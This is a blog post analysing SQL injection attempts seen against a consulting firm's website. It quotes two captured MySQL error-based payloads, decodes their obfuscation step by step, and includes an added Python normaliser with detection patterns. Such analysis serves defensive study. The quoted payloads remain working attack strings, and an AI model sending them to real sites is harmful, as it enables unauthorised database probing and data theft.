Founder and Lead Developer of Macrotone Consulting Ltd.

SQL Injection Attacks

We are experiencing a spate of SQL injection attacks upon our site.

These take the form of SQL strings appended to the end of otherwise valid URL addresses. A simple Google search reveals that there are many sites where the examples given below have triggered problems. Two typical strings are shown below:

(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)   

Or

+or+1=(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)+and+1=1   

As one can see, the code specifically targets MySQL databases. We presume that, if successful, they would then make further attempts to obtain more information in order to mount a more specific, targeted attack.

Note also the use of mixed case in the SQL strings, an attempt to bypass simple pattern-matching tests that may or may not be used to detect these types of attack.

Looking at the first example in more detail, we can first convert the hexadecimal strings to text and also change the case of the obvious SQL keywords to make for easier reading:

Converting the strings gives: 0x4142433134355a5136324457514146504f4959434644 converts to: 'ABC145ZQ62DWQAFPOIYCFD'

And 0x217e21 becomes: '!~!'

This gives us the following:

(/**/select+1+/**/from(/**/select+count(*),/**/concat((/**/select(/**/select+/**/unhex(/**/hex(/**/concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!'))))+/**/from+information_schema/**/tables+/**/limit+0,1),floor(rand(0)*2))x+/**/from+information_schema/**/tables+/**/group/**/by+x)a)

The next step is to change the ‘+’ signs to spaces, since in a URL these stand in for the spaces that separate the individual words.

(/**/select 1 /**/from(/**/select count(*),/**/concat((/**/select(/**/select /**/unhex(/**/hex(/**/concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!')))) /**/from information_schema/**/tables /**/limit 0,1),floor(rand(0)*2))x /**/from information_schema/**/tables /**/group/**/by x)a)

Take out the ‘/**/’ comment block strings [why add the comment blocks anyway, since they seem to add nothing other than perhaps a little obfuscation?] and we start to see something more sensible:

(select 1 from(select count(*), concat(( select( select unhex(hex( concat('!~!', 'ABC145ZQ62DWQAFPOIYCFD', '!~!')))) from information_schema tables limit 0,1),floor(rand(0)*2))x from information_schema tables group by x)a)

It is ironic that there appear to be syntax errors in the original source (two of which are identical!).

We are not yet sure what the significance of the hex strings is.
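The clean-up steps walked through above can be automated so that suspicious query strings in a web-server log are normalised and triaged consistently. The following is an added example written for this post, not code from the original article; the rule names in INDICATORS are hypothetical, and the sample strings are the two payloads quoted above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the first payload quoted in the post, as it would be
# appended to a URL and recorded in a web-server access log.
SAMPLE = ("(/**/sElEcT+1+/**/fRoM(/**/sElEcT+count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT+"
          "/**/uNhEx(/**/hEx(/**/cOnCaT(0x217e21,0x4142433134355a5136324457514146504f4959434644,"
          "0x217e21))))+/**/fRoM+information_schema/**/tAbLeS+/**/lImIt+0,1),floor(rand(0)*2))x+"
          "/**/fRoM+information_schema/**/tAbLeS+/**/gRoUp/**/bY+x)a)")
# The post's second payload is the same query wrapped in "+or+1=( ... )+and+1=1".
SAMPLE2 = "+or+1=" + SAMPLE + "+and+1=1"

HEX_LITERAL = re.compile(r"\b0x([0-9a-f]+)\b")

def _decode_hex_literal(match):
    """Quote the text a MySQL 0x... literal encodes; keep the literal if it is not printable ASCII."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)
    text = bytes.fromhex(digits).decode("ascii", errors="replace")
    if not (text.isascii() and text.isprintable()):
        return match.group(0)
    return "'" + text + "'"

def normalize_payload(raw):
    """The post's clean-up steps, ordered so the decoded marker text keeps its original case."""
    s = unquote_plus(raw)  # '+' is URL encoding for a space, %xx for a byte
    s = s.lower()  # undo the mIxEd-cAsE filter-evasion trick
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)  # a /**/ comment is whitespace to MySQL
    s = HEX_LITERAL.sub(_decode_hex_literal, s)  # 0x217e21 -> '!~!'
    return re.sub(r"\s+", " ", s).strip()

# Signals worth alerting on once the string is normalised (hypothetical rule names).
INDICATORS = {
    "information_schema": re.compile(r"\binformation_schema\b"),
    "rand_floor_groupby": re.compile(r"floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "unhex_hex": re.compile(r"unhex\(\s*hex\("),
    "tautology": re.compile(r"\b(?:and|or)\s+1\s*=\s*1\b"),
}

def sqli_indicators(raw):
    """Sorted names of the indicators a raw query string matches after normalisation."""
    s = normalize_payload(raw)
    return sorted(name for name, rx in INDICATORS.items() if rx.search(s))
```

Because the hex literals are decoded after lower-casing, the marker comes out as 'ABC145ZQ62DWQAFPOIYCFD' exactly as in the post, while every SQL keyword is lower-cased for matching.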

There is something very sad about a situation where certain individuals have nothing better to do with their time than waste it trying to disrupt others' efforts to disseminate information and share knowledge with those interested in improving themselves. Even more so since, if they crafted the SQL themselves, they have a certain amount of SQL skill which could be put to better use.
